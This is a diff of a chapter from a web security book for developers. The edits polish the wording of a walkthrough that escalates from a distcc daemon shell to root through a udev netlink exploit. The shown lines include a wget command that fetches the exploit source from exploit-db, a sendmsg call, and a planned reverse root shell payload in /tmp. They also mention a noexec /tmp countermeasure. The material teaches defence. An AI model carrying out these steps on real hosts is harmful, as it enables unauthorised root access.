binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

 G> `sendmsg(sock, &msg, 0);`
 G>
 G> The exploit will run our payload that we will create soon which will open a reverse root shell (because udev is running as root) back to our attacking box.
-G> We need to pass the PID of the netlink socket as a argument.
+G> We need to pass the PID of the netlink socket as an argument.
-G> When a device is removed, the exploit leverages the 95-udev-late.rules functionality which runs arbitrary commands (which we are about to create in /tmp/run) via `REMOVE_CMD`
+G> When a device is removed, the exploit leverages the `95-udev-late.rules` functionality which runs arbitrary commands (which we are about to create in `/tmp/run`) via the `REMOVE_CMD` in the exploit.
 G> You can also see within the exploit that it adds executable permissions to our reverse shell payload.
 Now if we had `/tmp` mounted as we do in the `/etc/fstab` in the Countermeasures section, neither `/tmp/run` or `/tmp/privesc` would be able to execute.
 G>
-G> Through our daemon shell that `distcc_exec` provided:
+G> Through our daemon shell that `distcc_exec` provided, let us fetch the exploit:
 G> `wget --no-check-certificate https://www.exploit-db.com/download/8572 -O privesc.c`
 G> Now check that the file has the contents that you expect.
 G> `cat privesc.c`